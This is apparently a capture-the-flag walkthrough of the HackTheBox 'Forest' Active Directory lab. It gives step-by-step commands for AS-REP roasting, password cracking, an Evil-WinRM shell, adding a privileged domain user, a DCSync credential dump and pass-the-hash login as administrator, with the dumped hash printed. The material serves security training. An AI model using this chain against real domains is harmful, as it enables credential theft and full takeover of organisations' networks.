Table of contents
Forest is an awesome Windows-based machine, difficulty was set as “Easy”, user score is 4.6.
This machine is all about Active Directory exploitation.
Enumeration
Start with nmap scan:
nmap -sS -sV -p- 10.10.10.161PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Continue with enum4linux
:
enum4linux -a forest.htb
Output is massive, but contain some useful information:
FOREST.htb.local
is the domain controllerEXCH01.htb.local
is an Exchange serverUsers sebastian, santi, andy, lucinda, mark and svc-alfresco
Exploitation
AS-REP Roasting is an attack against Kerberos for user accounts that do not require preauthentication. During preauthentication, a user will enter their password which will be used to encrypt a timestamp and then the domain controller will attempt to decrypt it and validate that the right password was used and that it is not replaying a previous request. If a user is configured to not require Kerberos pre-authentication, anyone can send a request (AS_REQ) to the KDC and receive a response (AS_REP). The response contains an encrypted chunk of data related to that user that can be cracked offline to retrieve the user's password. This can be automatized with tools like Impacket GetNPUsers.py:
GetNPUsers.py htb.local/ -usersfile users.txt -format john
We get a hash for a service account svc-alfresco
, now it’s time to crack it with john
:
john --wordlist=./rockyou.txt hash.txt
The password is s3rvice
.
As we got in nmap results, the 5985
port is open which is used for Windows remote management, we can use Evil-WinRM
to pop up a shell:
evil-winrm -u svc-alfresco -p s3rvice -I 10.10.10.161 -s ‘BloodHound/Ingestors/’
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
The -s
flag here stands for importing scripts, you can also use -e
to import .exe files (to run the mimikatz
, for example). That flag will help in the Privilege Escalation phase.
Privilege Escalation
User svc-alfresco
does not have any write permissions, but as we used -s
flag for Evil-WinRM
it’s not needed:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-SharpHound
Evil-WinRM
also has a great feature that allows you to download a .zip file from a SharpHound
:
download remote_filename` or `download remote_filename destination_filename
Run a BloodHound
and drag-and-drop the .zip from a SharpHound
. Now we have a valid path for privileged escalation to Domain Admin. As a service account svc-alfresco
is a member of Account Operators
can create new accounts with the right in Exchange Windows Permissions
group.
Creating a new user. As Evil-WinRM
is running the PowerShell by default, we can use both CMD’s and PS’s ways to do so:
net user z3v5 p@ssw0rd /domain /add
net group ‘Exchange Windows Permissions’ z3v5 /domain /add
OR
$pass = ConvertTo-SecureString "p@ssw0rd" -AsPlainText -Force
New-ADUser z3v5 -AccountPassword $pass -Enabled $True
Add-ADGroupMember -Identity "Exchange Windows Permissions" -members z3v5
New user z3v5
is a part of the Exchange Windows Permissions
group now and that’s mean we can perform DCSync
attack now. DCSync
right allows an attacker to simulate the behavior of a Domain Controller, and it has two stages:
Discover the Domain Controller in the provided domain
Request the Domain Controller to replicate the user credentials
To automate that we can use secretsdump.py
from Impacket
:
secretsdump.py z3v5:p@ssw0rd@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Plenty of different options for what to do with the hash of the Administrator
account, but I followed one the Evil-WinRM
:
evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator